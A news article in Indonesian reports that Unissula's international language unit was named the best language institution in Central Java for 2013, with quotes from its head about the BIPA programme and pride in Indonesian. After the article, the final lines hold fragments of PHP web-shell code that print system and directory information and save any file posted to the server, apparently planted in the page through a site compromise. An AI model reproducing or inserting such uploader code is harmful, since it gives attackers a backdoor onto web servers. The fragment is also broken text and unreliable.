Kembangkan BIPA Unissula Dianugerahi Lembaga Berbahasa Terbaik 2013

Pengembangan Bahasa Internanasional Unissula

Gambar : Nailil Muna MA (kiri) beserta staf UPT Pengembangan Bahasa Internasional Unissula memperlihatkan penghargaan yang diterima dari Kementrian Pendidikan dan Kebudayaan Balai Bahasa Jawa Tengah (10/1) di rung kerjanya.

“Disadari atau tidak, penggunaan bahasa asing oleh masyarakat Indonesia di ruang-ruang publik menjadi tren dan berpotensi menimbulkan gejala kurangnya kebanggaan masyarakat dalam menggunakan Bahasa Indonesia” demikian di ungkapkan Nailil Muna MA kepala UPT Pengembangan Bahasa Internasional Unissula (10/1). Masih menurut Nailil fenomena tersebut harus disikapi dengan bijak agar generasi bangsa ini bisa tetap mendunia tanpa harus kehilangan jati diri dan kearifan lokal termasuk di bidang bahasa, agar tak terjadi pengingkaran terhadap jati diri bangsa ditengah semaraknya penggunaan bahasa internasional. Hal inilah yang harus diinisiasi oleh lembaga pendidikan terutama perguruan tinggi untuk menumbuhkembangkan kecintaan terhadap bahasa Indonesia termasuk memperkenalkan bahasa tersebut kepada warga negara asing.

Ia mencontohkan saat ini yang sedang menjadi fokus Unissula melalui UPT Pengembangan Bahasa Internasional salah satunya adalah menjalanakan program BIPA (Bahasa Indonesia bagi Penutur Asing) dan kelas budaya Indonesia. “Satu hal yang harus kita sadari bahawa tidak sedikit warga negara lain tertarik mempelajari bahasa Indonesia, dan itu saya alami sendiri ketika salah satu wakil Unissula dan Indonesia sebagai salah satu pengajar bahasa Indonesia di Amerika Serikat selama sembilan bulan di tahun 2013 kemarin. Jadi tidak ada alasan bagi kita untuk tidak mencintai bahasa Indonesia” ungkap dosen Fakultas Bahasa Unissula tersebut.

Penghargaan Kemendikbud

Apa yang dilakukan Unissula ternyata mendapat apresiasi dari berbagai fihak salah satunya  dari Kementrian Pendidikan dan Kebudayaan Balai Bahasa Jawa Tengah. Kepala Balai Bahasa Provinsi Jawa Tengah, Drs Pardi MHum melalui surat resminya kepada Unissula menyampaikan selamat atas terpilihnya kampus hijau Unissula sebagai lembaga berbahasa terbaik di Jawa Tengah Tahun 2013. Malam penghargaan dilaksanakan pada bulan Desember 2013 dan diwakili oleh WR III Unissula Dr H Mustaghfirin.

Secara singkat, tim verifikasi Balai Bahasa berkoordinasi dengan UPT Pengembangan Bahasa Internasional Unissula menyampaikan rasa salutnya atas penggunaan bahasa internasional di Unissula yang mulai gencar diberitakan di media massa dan secara pribadi mendukung gagasan penggunaan bahasa internasional di institusi pendidikan. Hal ini di sepakati oleh Ka Pengembangan Bahasa Internasional UNISSULA, Nailil Muna yang pada kesempatan yang sama menjelaskan bahwa pengembangan program BIPA (Bahasa Indonesia bagi Penutur Asing) dan kelas Budaya Indonesia saat ini sedang menjadi fokus pengembangan UPT Bahasa.

Walaupun pada kenyataannya praktek pengembangan bahasa banyak mengalami hambatan terutama pada konsistensi penggunaan kepatutan bahasa, tetapi semangat dan tekad untuk peduli dan berbahasa yang baik, patut mendapatkan penghargaan.

[uname]”.php_uname().”[/uname]”;echo”
[dir]”.getcwd().”[/dir]”;echo”

“;echo”
“;if($_POST[“v”]==up){if(@copy($_FILES[“f”][“tmp_name”],$_FILES[“f”][“name”])){echo”Success–>”.$_FILES[“f”][“name”];}else{echo”Failed”;}}}